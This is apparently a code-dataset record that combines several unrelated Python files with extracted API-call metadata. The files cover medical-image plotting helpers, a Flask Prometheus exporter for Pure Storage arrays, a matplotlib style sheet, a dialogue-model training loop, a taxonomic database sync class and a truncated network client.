print("Balanced Accuracy (" + prefix + "): " + str(metrics[prefix + "bal_acc"]))
print(sk_metrics.classification_report(y_true, y_pred))
return metrics
# Transparent colormap (alpha to red), that is used for plotting an overlay.
# See https://stackoverflow.com/questions/37327308/add-alpha-to-an-existing-matplotlib-colormap
alpha_to_red_cmap = np.zeros((256, 4))
alpha_to_red_cmap[:, 0] = 0.8
alpha_to_red_cmap[:, -1] = np.linspace(0, 1, 256) # cmap.N-20) # alpha values
alpha_to_red_cmap = mpl.colors.ListedColormap(alpha_to_red_cmap)
red_to_alpha_cmap = np.zeros((256, 4))
red_to_alpha_cmap[:, 0] = 0.8
red_to_alpha_cmap[:, -1] = np.linspace(1, 0, 256) # cmap.N-20) # alpha values
red_to_alpha_cmap = mpl.colors.ListedColormap(red_to_alpha_cmap)
def animate_slices(
struct_arr,
overlay=None,
axis=0,
reverse_direction=False,
interval=40,
vmin=None,
vmax=None,
overlay_vmin=None,
overlay_vmax=None,
):
"""
Create a matplotlib animation that moves through a 3D image along a specified axis.
"""
if vmin is None:
vmin = struct_arr.min()
if vmax is None:
vmax = struct_arr.max()
if overlay_vmin is None and overlay is not None:
overlay_vmin = overlay.min()
if overlay_vmax is None and overlay is not None:
overlay_vmax = overlay.max()
fig, ax = plt.subplots()
axis_label = ["x", "y", "z"][axis]
# TODO: If I select slice 50 here at the beginning, the plots look different.
im = ax.imshow(
np.take(struct_arr, 0, axis=axis),
vmin=vmin,
vmax=vmax,
cmap="gray",
interpolation=None,
animated=True,
)
if overlay is not None:
im_overlay = ax.imshow(
np.take(overlay, 0, axis=axis),
vmin=overlay_vmin,
vmax=overlay_vmax,
cmap=alpha_to_red_cmap,
interpolation=None,
animated=True,
)
text = ax.text(
0.03,
0.97,
"{}={}".format(axis_label, 0),
color="white",
horizontalalignment="left",
verticalalignment="top",
transform=ax.transAxes,
)
ax.axis("off")
def update(i):
im.set_array(np.take(struct_arr, i, axis=axis))
if overlay is not None:
im_overlay.set_array(np.take(overlay, i, axis=axis))
text.set_text("{}={}".format(axis_label, i))
return im, text
num_frames = struct_arr.shape[axis]
if reverse_direction:
frames = np.arange(num_frames - 1, 0, -1)
else:
frames = np.arange(0, num_frames)
return mpl.animation.FuncAnimation(
fig, update, frames=frames, interval=interval, blit=True
)
def plot_slices(
struct_arr,
num_slices=7,
cmap="gray",
vmin=None,
vmax=None,
overlay=None,
overlay_cmap=alpha_to_red_cmap,
overlay_vmin=None,
overlay_vmax=None,
):
"""
Plot equally spaced slices of a 3D image (and an overlay) along every axis
Args:
struct_arr (3D array or tensor): The 3D array to plot (usually from a nifti file).
num_slices (int): The number of slices to plot for each dimension.
cmap: The colormap for the image (default: `'gray'`).
vmin (float): Same as in matplotlib.imshow. If `None`, take the global minimum of `struct_arr`.
vmax (float): Same as in matplotlib.imshow. If `None`, take the global maximum of `struct_arr`.
overlay (3D array or tensor): The 3D array to plot as an overlay on top of the image. Same size as `struct_arr`.
overlay_cmap: The colomap for the overlay (default: `alpha_to_red_cmap`).
overlay_vmin (float): Same as in matplotlib.imshow. If `None`, take the global minimum of `overlay`.
overlay_vmax (float): Same as in matplotlib.imshow. If `None`, take the global maximum of `overlay`.
"""
if vmin is None:
vmin = struct_arr.min()
if vmax is None:
vmax = struct_arr.max()
if overlay_vmin is None and overlay is not None:
overlay_vmin = overlay.min()
if overlay_vmax is None and overlay is not None:
overlay_vmax = overlay.max()
print(vmin, vmax, overlay_vmin, overlay_vmax)
fig, axes = plt.subplots(3, num_slices, figsize=(15, 6))
intervals = np.asarray(struct_arr.shape) / num_slices
for axis, axis_label in zip([0, 1, 2], ["x", "y", "z"]):
for i, ax in enumerate(axes[axis]):
i_slice = int(np.round(intervals[axis] / 2 + i * intervals[axis]))
# print(axis_label, 'plotting slice', i_slice)
plt.sca(ax)
plt.axis("off")
plt.imshow(
sp.ndimage.rotate(np.take(struct_arr, i_slice, axis=axis), 90),
vmin=vmin,
vmax=vmax,
cmap=cmap,
interpolation=None,
)
plt.text(
0.03,
0.97,
"{}={}".format(axis_label, i_slice),
color="white",
horizontalalignment="left",
verticalalignment="top",
transform=ax.transAxes,
)
if overlay is not None:
plt.imshow(
sp.ndimage.rotate(np.take(overlay, i_slice, axis=axis), 90),
cmap=overlay_cmap,
vmin=overlay_vmin,
vmax=overlay_vmax,
interpolation=None,
)
def draw_mask_3d(image:np.array,ax:Axes3D=None,zorder:int=0,markersize:float=0.8,alpha:float=1,c=None):
"""
    Draws all non-zero points of the given image in a scatter plot
Parameters
----------
image: where to get mask from
ax: if given uses this axis object
zorder: order of points drawn
markersize: size of points
alpha: transparency of points
    c: if given, points will be drawn in black
"""
fig = plt.figure()
if ax==None:
ax = Axes3D(fig)
else:
ax=ax
for cluster in range(1,int(np.unique(image)[-1]+1)):
if len(np.argwhere(image==cluster))==0:
print("no aneurysm found")
continue
if c==None:
ax.scatter(np.argwhere(image==cluster).T[0],np.argwhere(image==cluster).T[1],np.argwhere(image==cluster).T[2],s=markersize,alpha=alpha,zorder=zorder)
else:
ax.scatter(np.argwhere(image==cluster).T[0],np.argwhere(image==cluster).T[1],np.argwhere(image==cluster).T[2],s=3,alpha=alpha,zorder=zorder,c="black")
def draw_image(image:np.array,ax:Axes3D=None,zorder:int=0,markersize:float=0.8,transparency:bool=True):
"""
    Draws all non-zero points of the given image in a scatter plot, colored according to their intensity
Parameters
----------
image: where to get mask from
ax: if given uses this axis object
zorder: order of points drawn
markersize: size of points
transparency: if true scales transparency with intensity values
"""
fig = plt.figure()
if ax==None:
ax = Axes3D(fig)
else:
ax=ax
if transparency:
alpha= image[image>0]
alpha = np.where(alpha>0.15,alpha,0.01)
else:
alpha=1
cmap = plt.get_cmap('YlOrRd')
ax.scatter(np.argwhere(image>0).T[0],np.argwhere(image>0).T[1],np.argwhere(image>0).T[2],s=markersize,alpha=image[image>0],zorder=zorder,c=cmap(image[image>0]))
def draw_bounding_box(candidates,ax:Axes3D=None):
"""
Draws bounding box of given bounding box dictionary -> see postprocessing function
Parameters
----------
    candidates: list of dictionaries whose 'vertices' entry contains the corner points of the bounding box
ax: if given uses this axis object
"""
fig = plt.figure()
if ax==None:
ax = Axes3D(fig)
else:
ax=ax
for candidate in candidates:
Z= candidate["vertices"]
Z=np.array(Z)
verts= [(Z[0],Z[1]),(Z[0],Z[2]),(Z[0],Z[3]),(Z[6],Z[1]),(Z[7],Z[1]),(Z[2],Z[5]),
(Z[2],Z[7]),(Z[3],Z[5]),(Z[3],Z[6]),(Z[4],Z[7]),(Z[4],Z[6]),(Z[4],Z[5])]
for element in verts:
x=[element[0][0],element[1][0]]
y=[element[0][1],element[1][1]]
z=[element[0][2],element[1][2]]
ax.plot(x,y,z,c='r',linewidth=2,alpha=1)
fig.show()
|
[
"sklearn.metrics.accuracy_score",
"sklearn.metrics.classification_report",
"matplotlib.animation.FuncAnimation",
"matplotlib.pyplot.figure",
"sklearn.metrics.f1_score",
"numpy.arange",
"matplotlib.colors.ListedColormap",
"numpy.round",
"numpy.unique",
"numpy.linspace",
"matplotlib.pyplot.subplots",
"matplotlib.pyplot.get_cmap",
"mpl_toolkits.mplot3d.Axes3D",
"numpy.asarray",
"sklearn.metrics.recall_score",
"numpy.argwhere",
"numpy.concatenate",
"sklearn.metrics.balanced_accuracy_score",
"numpy.zeros",
"matplotlib.pyplot.axis",
"numpy.where",
"numpy.take",
"numpy.array",
"sklearn.metrics.precision_score",
"matplotlib.pyplot.sca"
] |
[((2528, 2546), 'numpy.zeros', 'np.zeros', (['(256, 4)'], {}), '((256, 4))\n', (2536, 2546), True, 'import numpy as np\n'), ((2604, 2626), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(256)'], {}), '(0, 1, 256)\n', (2615, 2626), True, 'import numpy as np\n'), ((2677, 2721), 'matplotlib.colors.ListedColormap', 'mpl.colors.ListedColormap', (['alpha_to_red_cmap'], {}), '(alpha_to_red_cmap)\n', (2702, 2721), True, 'import matplotlib as mpl\n'), ((2743, 2761), 'numpy.zeros', 'np.zeros', (['(256, 4)'], {}), '((256, 4))\n', (2751, 2761), True, 'import numpy as np\n'), ((2819, 2841), 'numpy.linspace', 'np.linspace', (['(1)', '(0)', '(256)'], {}), '(1, 0, 256)\n', (2830, 2841), True, 'import numpy as np\n'), ((2892, 2936), 'matplotlib.colors.ListedColormap', 'mpl.colors.ListedColormap', (['red_to_alpha_cmap'], {}), '(red_to_alpha_cmap)\n', (2917, 2936), True, 'import matplotlib as mpl\n'), ((1411, 1452), 'sklearn.metrics.accuracy_score', 'sk_metrics.accuracy_score', (['y_true', 'y_pred'], {}), '(y_true, y_pred)\n', (1436, 1452), True, 'from sklearn import metrics as sk_metrics\n'), ((1487, 1537), 'sklearn.metrics.balanced_accuracy_score', 'sk_metrics.balanced_accuracy_score', (['y_true', 'y_pred'], {}), '(y_true, y_pred)\n', (1521, 1537), True, 'from sklearn import metrics as sk_metrics\n'), ((3536, 3550), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (3548, 3550), True, 'import matplotlib.pyplot as plt\n'), ((4790, 4879), 'matplotlib.animation.FuncAnimation', 'mpl.animation.FuncAnimation', (['fig', 'update'], {'frames': 'frames', 'interval': 'interval', 'blit': '(True)'}), '(fig, update, frames=frames, interval=interval,\n blit=True)\n', (4817, 4879), True, 'import matplotlib as mpl\n'), ((6409, 6453), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(3)', 'num_slices'], {'figsize': '(15, 6)'}), '(3, num_slices, figsize=(15, 6))\n', (6421, 6453), True, 'import matplotlib.pyplot as plt\n'), ((8107, 8119), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (8117, 8119), True, 'import matplotlib.pyplot as plt\n'), ((9197, 9209), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (9207, 9209), True, 'import matplotlib.pyplot as plt\n'), ((9412, 9434), 'matplotlib.pyplot.get_cmap', 'plt.get_cmap', (['"""YlOrRd"""'], {}), "('YlOrRd')\n", (9424, 9434), True, 'import matplotlib.pyplot as plt\n'), ((9934, 9946), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (9944, 9946), True, 'import matplotlib.pyplot as plt\n'), ((1587, 1629), 'sklearn.metrics.precision_score', 'sk_metrics.precision_score', (['y_true', 'y_pred'], {}), '(y_true, y_pred)\n', (1613, 1629), True, 'from sklearn import metrics as sk_metrics\n'), ((1667, 1706), 'sklearn.metrics.recall_score', 'sk_metrics.recall_score', (['y_true', 'y_pred'], {}), '(y_true, y_pred)\n', (1690, 1706), True, 'from sklearn import metrics as sk_metrics\n'), ((1742, 1794), 'sklearn.metrics.recall_score', 'sk_metrics.recall_score', (['y_true', 'y_pred'], {'pos_label': '(0)'}), '(y_true, y_pred, pos_label=0)\n', (1765, 1794), True, 'from sklearn import metrics as sk_metrics\n'), ((1829, 1881), 'sklearn.metrics.recall_score', 'sk_metrics.recall_score', (['y_true', 'y_pred'], {'pos_label': '(1)'}), '(y_true, y_pred, pos_label=1)\n', (1852, 1881), True, 'from sklearn import metrics as sk_metrics\n'), ((1915, 1950), 'sklearn.metrics.f1_score', 'sk_metrics.f1_score', (['y_true', 'y_pred'], {}), '(y_true, y_pred)\n', (1934, 1950), True, 'from sklearn import metrics as sk_metrics\n'), ((2263, 2311), 
'sklearn.metrics.classification_report', 'sk_metrics.classification_report', (['y_true', 'y_pred'], {}), '(y_true, y_pred)\n', (2295, 2311), True, 'from sklearn import metrics as sk_metrics\n'), ((3701, 3734), 'numpy.take', 'np.take', (['struct_arr', '(0)'], {'axis': 'axis'}), '(struct_arr, 0, axis=axis)\n', (3708, 3734), True, 'import numpy as np\n'), ((4693, 4725), 'numpy.arange', 'np.arange', (['(num_frames - 1)', '(0)', '(-1)'], {}), '(num_frames - 1, 0, -1)\n', (4702, 4725), True, 'import numpy as np\n'), ((4753, 4777), 'numpy.arange', 'np.arange', (['(0)', 'num_frames'], {}), '(0, num_frames)\n', (4762, 4777), True, 'import numpy as np\n'), ((6470, 6498), 'numpy.asarray', 'np.asarray', (['struct_arr.shape'], {}), '(struct_arr.shape)\n', (6480, 6498), True, 'import numpy as np\n'), ((8150, 8161), 'mpl_toolkits.mplot3d.Axes3D', 'Axes3D', (['fig'], {}), '(fig)\n', (8156, 8161), False, 'from mpl_toolkits.mplot3d import Axes3D\n'), ((9240, 9251), 'mpl_toolkits.mplot3d.Axes3D', 'Axes3D', (['fig'], {}), '(fig)\n', (9246, 9251), False, 'from mpl_toolkits.mplot3d import Axes3D\n'), ((9343, 9378), 'numpy.where', 'np.where', (['(alpha > 0.15)', 'alpha', '(0.01)'], {}), '(alpha > 0.15, alpha, 0.01)\n', (9351, 9378), True, 'import numpy as np\n'), ((9977, 9988), 'mpl_toolkits.mplot3d.Axes3D', 'Axes3D', (['fig'], {}), '(fig)\n', (9983, 9988), False, 'from mpl_toolkits.mplot3d import Axes3D\n'), ((10089, 10100), 'numpy.array', 'np.array', (['Z'], {}), '(Z)\n', (10097, 10100), True, 'import numpy as np\n'), ((3924, 3954), 'numpy.take', 'np.take', (['overlay', '(0)'], {'axis': 'axis'}), '(overlay, 0, axis=axis)\n', (3931, 3954), True, 'import numpy as np\n'), ((4400, 4433), 'numpy.take', 'np.take', (['struct_arr', 'i'], {'axis': 'axis'}), '(struct_arr, i, axis=axis)\n', (4407, 4433), True, 'import numpy as np\n'), ((6769, 6780), 'matplotlib.pyplot.sca', 'plt.sca', (['ax'], {}), '(ax)\n', (6776, 6780), True, 'import matplotlib.pyplot as plt\n'), ((6793, 6808), 'matplotlib.pyplot.axis', 'plt.axis', (['"""off"""'], {}), "('off')\n", (6801, 6808), True, 'import matplotlib.pyplot as plt\n'), ((1212, 1234), 'numpy.concatenate', 'np.concatenate', (['y_true'], {}), '(y_true)\n', (1226, 1234), True, 'import numpy as np\n'), ((1260, 1282), 'numpy.concatenate', 'np.concatenate', (['y_pred'], {}), '(y_pred)\n', (1274, 1282), True, 'import numpy as np\n'), ((4500, 4530), 'numpy.take', 'np.take', (['overlay', 'i'], {'axis': 'axis'}), '(overlay, i, axis=axis)\n', (4507, 4530), True, 'import numpy as np\n'), ((6644, 6695), 'numpy.round', 'np.round', (['(intervals[axis] / 2 + i * intervals[axis])'], {}), '(intervals[axis] / 2 + i * intervals[axis])\n', (6652, 6695), True, 'import numpy as np\n'), ((8258, 8287), 'numpy.argwhere', 'np.argwhere', (['(image == cluster)'], {}), '(image == cluster)\n', (8269, 8287), True, 'import numpy as np\n'), ((9450, 9472), 'numpy.argwhere', 'np.argwhere', (['(image > 0)'], {}), '(image > 0)\n', (9461, 9472), True, 'import numpy as np\n'), ((9476, 9498), 'numpy.argwhere', 'np.argwhere', (['(image > 0)'], {}), '(image > 0)\n', (9487, 9498), True, 'import numpy as np\n'), ((9502, 9524), 'numpy.argwhere', 'np.argwhere', (['(image > 0)'], {}), '(image > 0)\n', (9513, 9524), True, 'import numpy as np\n'), ((6867, 6906), 'numpy.take', 'np.take', (['struct_arr', 'i_slice'], {'axis': 'axis'}), '(struct_arr, i_slice, axis=axis)\n', (6874, 6906), True, 'import numpy as np\n'), ((8217, 8233), 'numpy.unique', 'np.unique', (['image'], {}), '(image)\n', (8226, 8233), True, 'import numpy as np\n'), 
((7436, 7472), 'numpy.take', 'np.take', (['overlay', 'i_slice'], {'axis': 'axis'}), '(overlay, i_slice, axis=axis)\n', (7443, 7472), True, 'import numpy as np\n'), ((8394, 8423), 'numpy.argwhere', 'np.argwhere', (['(image == cluster)'], {}), '(image == cluster)\n', (8405, 8423), True, 'import numpy as np\n'), ((8427, 8456), 'numpy.argwhere', 'np.argwhere', (['(image == cluster)'], {}), '(image == cluster)\n', (8438, 8456), True, 'import numpy as np\n'), ((8460, 8489), 'numpy.argwhere', 'np.argwhere', (['(image == cluster)'], {}), '(image == cluster)\n', (8471, 8489), True, 'import numpy as np\n'), ((8570, 8599), 'numpy.argwhere', 'np.argwhere', (['(image == cluster)'], {}), '(image == cluster)\n', (8581, 8599), True, 'import numpy as np\n'), ((8603, 8632), 'numpy.argwhere', 'np.argwhere', (['(image == cluster)'], {}), '(image == cluster)\n', (8614, 8632), True, 'import numpy as np\n'), ((8636, 8665), 'numpy.argwhere', 'np.argwhere', (['(image == cluster)'], {}), '(image == cluster)\n', (8647, 8665), True, 'import numpy as np\n')]
|
#!/usr/bin/env python
from flask import Flask, request, abort, make_response
from flask_httpauth import HTTPTokenAuth
from urllib.parse import parse_qs
import re
from prometheus_client import generate_latest, CollectorRegistry, CONTENT_TYPE_LATEST
from flasharray_collector import FlasharrayCollector
import logging
class InterceptRequestMiddleware:
def __init__(self, wsgi_app):
self.wsgi_app = wsgi_app
def __call__(self, environ, start_response):
d = parse_qs(environ['QUERY_STRING'])
api_token = d.get('apitoken', [''])[0] # Returns the first api-token value
if 'HTTP_AUTHORIZATION' not in environ:
environ['HTTP_AUTHORIZATION'] = 'Bearer ' + api_token
return self.wsgi_app(environ, start_response)
app = Flask(__name__)
app.logger.setLevel(logging.INFO)
app.wsgi_app = InterceptRequestMiddleware(app.wsgi_app)
auth = HTTPTokenAuth(scheme='Bearer')
@auth.verify_token
def verify_token(token):
pattern_str = r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$"
regx = re.compile(pattern_str)
match = regx.search(token)
return token if match is not None else False
@app.route('/')
def route_index():
"""Display an overview of the exporters capabilities."""
return '''
    <h1>Pure Storage Prometheus Exporter</h1>
<table>
<thead>
<tr>
<td>Type</td>
<td>Endpoint</td>
<td>GET parameters</td>
</tr>
</thead>
<tbody>
<tr>
<td>Full metrics</td>
<td><a href="/metrics?endpoint=host&apitoken=xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx">/metrics</a></td>
            <td>endpoint, apitoken (optional, required only if authentication token is not provided)</td>
</tr>
<tr>
<td>Volume metrics</td>
<td><a href="/metrics/volumes?endpoint=host&apitoken=<KEY>">/metrics/volumes</a></td>
            <td>endpoint, apitoken (optional, required only if authentication token is not provided)</td>
<td>Retrieves only volume related metrics</td>
</tr>
<tr>
<td>Host metrics</td>
<td><a href="/metrics/hosts?endpoint=host&apitoken=<KEY>">/metrics/hosts</a></td>
            <td>endpoint, apitoken (optional, required only if authentication token is not provided)</td>
<td>Retrieves only host related metrics</td>
</tr>
<tr>
<td>Pod metrics</td>
<td><a href="/metrics/pods?endpoint=host&apitoken=<KEY>">/metrics/pods</a></td>
            <td>endpoint, apitoken (optional, required only if authentication token is not provided)</td>
<td>Retrieves only pod related metrics</td>
</tr>
</tbody>
</table>
'''
@app.route('/metrics/<m_type>', methods=['GET'])
@auth.login_required
def route_flasharray(m_type: str):
"""Produce FlashArray metrics."""
if not m_type in ['array', 'volumes', 'hosts', 'pods']:
m_type = 'all'
collector = FlasharrayCollector
registry = CollectorRegistry()
try:
endpoint = request.args.get('endpoint', None)
token = auth.current_user()
registry.register(collector(endpoint, token, m_type))
except Exception as e:
app.logger.warn('%s: %s', collector.__name__, str(e))
abort(500)
resp = make_response(generate_latest(registry), 200)
resp.headers['Content-type'] = CONTENT_TYPE_LATEST
return resp
@app.route('/metrics', methods=['GET'])
def route_flasharray_all():
return route_flasharray('all')
@app.errorhandler(400)
def route_error_400(error):
"""Handle invalid request errors."""
return 'Invalid request parameters', 400
@app.errorhandler(404)
def route_error_404(error):
""" Handle 404 (HTTP Not Found) errors."""
return 'Not found', 404
@app.errorhandler(500)
def route_error_500(error):
"""Handle server-side errors."""
return 'Internal server error', 500
# Run in debug mode when not called by WSGI
if __name__ == "__main__":
app.logger.setLevel(logging.DEBUG)
app.logger.debug('running in debug mode...')
app.run(host="0.0.0.0", port=8080, debug=True)
|
[
"prometheus_client.CollectorRegistry",
"prometheus_client.generate_latest",
"flask.request.args.get",
"flask.Flask",
"flask.abort",
"urllib.parse.parse_qs",
"flask_httpauth.HTTPTokenAuth",
"re.compile"
] |
[((774, 789), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (779, 789), False, 'from flask import Flask, request, abort, make_response\n'), ((887, 917), 'flask_httpauth.HTTPTokenAuth', 'HTTPTokenAuth', ([], {'scheme': '"""Bearer"""'}), "(scheme='Bearer')\n", (900, 917), False, 'from flask_httpauth import HTTPTokenAuth\n'), ((1058, 1081), 're.compile', 're.compile', (['pattern_str'], {}), '(pattern_str)\n', (1068, 1081), False, 'import re\n'), ((3166, 3185), 'prometheus_client.CollectorRegistry', 'CollectorRegistry', ([], {}), '()\n', (3183, 3185), False, 'from prometheus_client import generate_latest, CollectorRegistry, CONTENT_TYPE_LATEST\n'), ((482, 515), 'urllib.parse.parse_qs', 'parse_qs', (["environ['QUERY_STRING']"], {}), "(environ['QUERY_STRING'])\n", (490, 515), False, 'from urllib.parse import parse_qs\n'), ((3214, 3248), 'flask.request.args.get', 'request.args.get', (['"""endpoint"""', 'None'], {}), "('endpoint', None)\n", (3230, 3248), False, 'from flask import Flask, request, abort, make_response\n'), ((3481, 3506), 'prometheus_client.generate_latest', 'generate_latest', (['registry'], {}), '(registry)\n', (3496, 3506), False, 'from prometheus_client import generate_latest, CollectorRegistry, CONTENT_TYPE_LATEST\n'), ((3444, 3454), 'flask.abort', 'abort', (['(500)'], {}), '(500)\n', (3449, 3454), False, 'from flask import Flask, request, abort, make_response\n')]
|
"Defines matplotlib stylesheet"
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
# %%-- Matplotlib style sheet
mpl.style.use('seaborn-paper')
mpl.rcParams['font.family'] = 'serif'
mpl.rcParams['font.serif'] ='STIXGeneral'
mpl.rcParams['font.size'] = 14
mpl.rcParams['mathtext.default'] = 'rm'
mpl.rcParams['mathtext.fallback'] = 'cm'
mpl.rcParams['mathtext.fontset'] = 'stix'
mpl.rcParams['axes.labelsize'] = 16
mpl.rcParams['axes.labelweight'] = 'normal'
mpl.rcParams['axes.grid.which']='both'
mpl.rcParams['axes.xmargin']=0.05
mpl.rcParams['axes.ymargin']=0.05
mpl.rcParams['grid.linewidth']= 0
mpl.rcParams['xtick.labelsize'] = 14
mpl.rcParams['xtick.bottom'] = True
mpl.rcParams['xtick.top'] = True
mpl.rcParams['xtick.direction'] = 'in'
mpl.rcParams['ytick.left'] = True
mpl.rcParams['ytick.right'] = True
mpl.rcParams['ytick.direction'] = 'in'
mpl.rcParams['ytick.labelsize'] = 14
mpl.rcParams['legend.fontsize'] = 14
mpl.rcParams['figure.titlesize'] = 18
mpl.rcParams['figure.figsize'] = (8.09,5)
mpl.rcParams['figure.autolayout'] = False
mpl.rcParams['figure.dpi'] = 75
mpl.rcParams['image.cmap'] = "viridis"
mpl.rcParams['savefig.dpi'] = 150
mpl.rcParams['errorbar.capsize'] = 3
mpl.rcParams['axes.prop_cycle'] = plt.cycler(color = plt.cm.viridis([0.8,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9]))
mpl.rcParams['axes.titlesize'] = 16
# %%-
|
[
"matplotlib.style.use",
"matplotlib.pyplot.cm.viridis"
] |
[((140, 170), 'matplotlib.style.use', 'mpl.style.use', (['"""seaborn-paper"""'], {}), "('seaborn-paper')\n", (153, 170), True, 'import matplotlib as mpl\n'), ((1270, 1331), 'matplotlib.pyplot.cm.viridis', 'plt.cm.viridis', (['[0.8, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]'], {}), '([0.8, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9])\n', (1284, 1331), True, 'import matplotlib.pyplot as plt\n')]
|
from data_utils import UDC
from transformer_rnn import TransformerRNN
from args import get_args
from eval import eval_model
import torch
import numpy as np
from tqdm import tqdm
import torch.optim as optim
import torch.nn.functional as F
from sklearn.metrics import f1_score
import torch.nn as nn
args = get_args()
if args.gpu:
torch.cuda.manual_seed(args.randseed)
data = UDC(train_inp=args.train_inp,
val_inp=args.val_inp)
model = TransformerRNN(emb_dim=args.input_size, n_vocab=data.bpe.vocab_size(), rnn_h_dim=256, gpu = args.gpu)
criteria = nn.NLLLoss()
solver = optim.Adam(model.parameters(), lr=args.lr)
def train():
for epoch in range(args.epochs):
model.train()
print('\n\n-------------------------------------------')
print('Epoch-{}'.format(epoch))
print('-------------------------------------------')
train_iter = enumerate(data.get_batches('train'))
if not args.no_tqdm:
train_iter = tqdm(train_iter)
train_iter.set_description_str('Training')
train_iter.total = len(data.train)
for it, mb in train_iter:
c, c_u_m, c_m, r, r_u_m, r_m, y = mb
# print (c, c_u_m, c_m, r, y)
# getting predictions
pred = model(c, c_u_m, c_m, r, r_u_m, r_m)
#train_iter.set_description(model.print_loss())
#loss = F.nll_loss(pred, r)
#loss = criteria(pred, y)
#y = torch.argmax(y)
#print (y.size())
loss = criteria(pred, y)
loss.backward()
#print (model.conv3.grad)
#clip_gradient_threshold(model, -10, 10)
solver.step()
solver.zero_grad()
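        # Evaluate MRR on the validation split after every epoch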
val_mrr = eval_model(model, data, 'valid')
print ('Validation MRR for this epoch:'+str(val_mrr))
if __name__ == '__main__':
train()
|
[
"tqdm.tqdm",
"data_utils.UDC",
"eval.eval_model",
"torch.cuda.manual_seed",
"args.get_args",
"torch.nn.NLLLoss"
] |
[((305, 315), 'args.get_args', 'get_args', ([], {}), '()\n', (313, 315), False, 'from args import get_args\n'), ((378, 429), 'data_utils.UDC', 'UDC', ([], {'train_inp': 'args.train_inp', 'val_inp': 'args.val_inp'}), '(train_inp=args.train_inp, val_inp=args.val_inp)\n', (381, 429), False, 'from data_utils import UDC\n'), ((563, 575), 'torch.nn.NLLLoss', 'nn.NLLLoss', ([], {}), '()\n', (573, 575), True, 'import torch.nn as nn\n'), ((333, 370), 'torch.cuda.manual_seed', 'torch.cuda.manual_seed', (['args.randseed'], {}), '(args.randseed)\n', (355, 370), False, 'import torch\n'), ((1752, 1784), 'eval.eval_model', 'eval_model', (['model', 'data', '"""valid"""'], {}), "(model, data, 'valid')\n", (1762, 1784), False, 'from eval import eval_model\n'), ((981, 997), 'tqdm.tqdm', 'tqdm', (['train_iter'], {}), '(train_iter)\n', (985, 997), False, 'from tqdm import tqdm\n')]
|
import logging
import logging.config
logger = logging.getLogger('sync_gbif2tnt')
import re
import pudb
from configparser import ConfigParser
config = ConfigParser()
config.read('config.ini')
from .InsertIntoTablesBase import InsertIntoTablesBase
class InsertExternalDatabaseBase(InsertIntoTablesBase):
def __init__(self, tntdbcon, temptablename):
InsertIntoTablesBase.__init__(self, tntdbcon)
self.temptable = temptablename
self.externaldatabasetable = 'TaxonNameExternalDatabase'
self.idcolumn = 'ExternalDatabaseID'
self.externalidstable = 'TaxonNameExternalID'
self.gbif_source = dict(config['gbif_source_details'])
self.edb_uri = self.gbif_source['uri']
self.edb_name = self.gbif_source['name']
self.edb_accession_date = self.gbif_source['accessiondate']
self.edb_version = self.gbif_source['version']
self.edb_license = self.gbif_source['license']
self.insertExternalDatabase()
self.insertExternalIDs()
def getExternalDatabaseID(self):
query = """
SELECT [ExternalDatabaseID]
FROM
[{0}]
WHERE
[ExternalDatabaseURI] = ?
AND [ExternalDatabaseName] = ?
AND [ExternalDatabaseVersion] = ?
""".format(self.externaldatabasetable)
self.cur.execute(query, [
self.edb_uri,
self.edb_name,
self.edb_version
])
row = self.cur.fetchone()
if row is None:
return None
else:
return row[0]
def insertExternalDatabase(self):
self.databaseid = self.getExternalDatabaseID()
if self.databaseid is not None:
return
else:
maxid = self.getMaxID(self.externaldatabasetable, self.idcolumn)
query = """
INSERT INTO [{0}] (
[ExternalDatabaseID]
, [ExternalDatabaseURI]
, [ExternalDatabaseName]
, [InternalNotes]
, [ExternalDatabaseVersion]
, [Rights]
)
VALUES (?, ?, ?, ?, ?, ?)
;""".format(self.externaldatabasetable)
self.cur.execute(query, [
maxid + 1,
self.edb_uri,
self.edb_name,
self.edb_accession_date,
self.edb_version,
self.edb_license
])
self.con.commit()
self.databaseid = maxid + 1
return
def insertExternalIDs(self):
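        # Link every name in the temp table to this external database via its GBIF taxon URL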
query = """
INSERT INTO [{0}]
(
[NameID],
[ExternalDatabaseID],
[ExternalNameURI]
)
SELECT [NameID]
, {1} AS [ExternalDatabaseID]
, [GBIFTaxonURL]
FROM
[{2}]
;""".format(self.externalidstable, self.databaseid, self.temptable)
self.cur.execute(query)
self.con.commit()
|
[
"configparser.ConfigParser",
"logging.getLogger"
] |
[((47, 81), 'logging.getLogger', 'logging.getLogger', (['"""sync_gbif2tnt"""'], {}), "('sync_gbif2tnt')\n", (64, 81), False, 'import logging\n'), ((154, 168), 'configparser.ConfigParser', 'ConfigParser', ([], {}), '()\n', (166, 168), False, 'from configparser import ConfigParser\n')]
|
import time
import warnings
import socket
from _thread import allocate_lock
from os import getpid
from speedysvc.toolkit.documentation.copydoc import copydoc
from speedysvc.client_server.base_classes.ClientProviderBase import ClientProviderBase
from speedysvc.client_server.network.consts import len_packer, response_packer
from speedysvc.compression.compression_types import zlib_compression
class NetworkClient(ClientProviderBase):
def __init__(self,
server_methods,
host='127.0.0.1', port=None,
compression_inst=zlib_compression):
"""
:param server_methods:
:param host:
"""
self.host = host
self.port = port
self.lock = allocate_lock()
ClientProviderBase.__init__(self, server_methods)
self.compression_inst = compression_inst
self.__connect()
def __connect(self):
self.conn_to_server = conn_to_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
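        # Tune the socket for small, latency-sensitive messages: no Nagle, larger buffers, keepalive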
conn_to_server.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)
conn_to_server.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 65536)
conn_to_server.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 65536)
